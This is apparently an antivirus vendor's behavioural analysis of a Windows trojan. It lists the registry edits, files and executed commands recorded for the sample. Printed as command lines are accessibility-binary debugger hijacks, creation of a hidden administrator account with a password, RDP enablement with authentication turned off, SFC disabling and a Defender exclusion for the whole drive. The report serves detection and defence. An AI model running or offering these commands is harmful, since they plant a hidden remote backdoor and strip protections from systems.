Trojan.Siggen9.11923

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe] 'debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = 'hestc.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe] 'debugger' = 'hobist.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe] 'debugger' = 'wlan.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe] 'debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe] 'debugger' = 'tarrnor.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe] 'debugger' = '<SYSTEM32>\Magnify.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe] 'debugger' = 'calc.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe] 'debugger' = 'fixmapi.exe'
[<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe] 'debugger' = 'fixmapi.exe'

Creates the following services

[<HKLM>\System\CurrentControlSet\Services\RasMan] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\RemoteAccess] 'Start' = '00000002'

Malicious functions

To complicate detection of its presence in the operating system,

blocks the following features:

System File Checker (SFC)

Modifies file system

Creates the following files

<Current directory>\u.bat
<Current directory>\tspatch.exe
<Current directory>\sh_xp.bat
<Current directory>\zzap_hestc32.exe
<Current directory>\zzap_hobist32.exe
<Current directory>\zzap_tarrnor32.exe
<Current directory>\zzap_wlan32.exe
%WINDIR%\syswow64\wlan.exe
%WINDIR%\syswow64\hestc.exe
%WINDIR%\syswow64\hobist.exe
%WINDIR%\syswow64\tarrnor.exe
%WINDIR%\syswow64\pilman.exe
<Current directory>\tspatch.log
<SYSTEM32>\logfiles\in2002.log

Deletes the following files

<Current directory>\zzap_hestc32.exe
<Current directory>\zzap_hobist32.exe
<Current directory>\zzap_tarrnor32.exe
<Current directory>\zzap_wlan32.exe

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''

Creates and executes the following

'<Current directory>\tspatch.exe' -silent

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c ""<Current directory>\U.bat" "
'%WINDIR%\syswow64\net1.exe' user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"
'%WINDIR%\syswow64\net.exe' localgroup Administrators ontar /add
'%WINDIR%\syswow64\net1.exe' localgroup Administrators ontar /add
'%WINDIR%\syswow64\cmd.exe' /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
'%WINDIR%\syswow64\wbem\wmic.exe' Group Where "SID = 'S-1-5-32-555'" Get Name /Value
'%WINDIR%\syswow64\net.exe' localgroup "Remote Desktop Users" ontar /add
'%WINDIR%\syswow64\net1.exe' localgroup "Remote Desktop Users" ontar /add
'%WINDIR%\syswow64\net.exe' accounts /forcelogoff:no /maxpwage:unlimited
'%WINDIR%\syswow64\net1.exe' accounts /forcelogoff:no /maxpwage:unlimited
'%WINDIR%\syswow64\net.exe' user ontar /active:yes
'%WINDIR%\syswow64\net1.exe' user ontar /active:yes
'%WINDIR%\syswow64\find.exe' "="
'%WINDIR%\syswow64\net.exe' user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"
'%WINDIR%\syswow64\net.exe' user ontar /fullname:"ontar"
'%WINDIR%\syswow64\net1.exe' user ontar /comment:"temporary user"
'%WINDIR%\syswow64\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0" /v "Version" /t REG_DWORD /d "196611" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "StartTimeLo" /t REG_DWORD /d "2386147405" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "EndTimeLo" /t REG_DWORD /d "2387249407" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0" /v "Version" /t REG_DWORD /d "196611" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}" /v "LastPolicyTime" /t REG_DWORD /d "19856934" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SYSTEM\ControlSet001\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f
'%WINDIR%\syswow64\net1.exe' user ontar /fullname:"ontar"
'%WINDIR%\syswow64\net.exe' user ontar /comment:"temporary user"
'%WINDIR%\syswow64\wbem\wmic.exe' Group Where "SID = 'S-1-5-32-544'" Get Name /Value
'%WINDIR%\syswow64\cmd.exe' /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
'%WINDIR%\syswow64\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
'%WINDIR%\syswow64\net1.exe' accounts /forcelogoff:no
'%WINDIR%\syswow64\cmd.exe' /c ""<Current directory>\SH_xp.bat" "
'%WINDIR%\syswow64\net.exe' accounts /maxpwage:unlimited
'%WINDIR%\syswow64\net1.exe' accounts /maxpwage:unlimited
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "hestc.exe" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "hobist.exe" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wlan.exe" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "tarrnor.exe" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "<SYSTEM32>\Magnify.exe" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d "00000000" /f
'%WINDIR%\syswow64\net.exe' accounts /forcelogoff:no
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe" /v "debugger" /t REG_SZ /d "calc.exe" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SYSTE╠ /t REG_DWORD /d "00000000" /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d "4294967197" /f
'%WINDIR%\syswow64\sc.exe' config rasman start= auto
'%WINDIR%\syswow64\sc.exe' config remoteaccess start= auto
'%WINDIR%\syswow64\net.exe' start rasman
'%WINDIR%\syswow64\net1.exe' start rasman
'%WINDIR%\syswow64\net.exe' start remoteaccess
'%WINDIR%\syswow64\net1.exe' start remoteaccess
'%WINDIR%\syswow64\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
'%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
'%WINDIR%\syswow64\reg.exe' add "HKU\S-1-5-21-1252767878-4065156067-3399968500-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /v "P:\FUNER\Iveghny\Ertfubg....
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial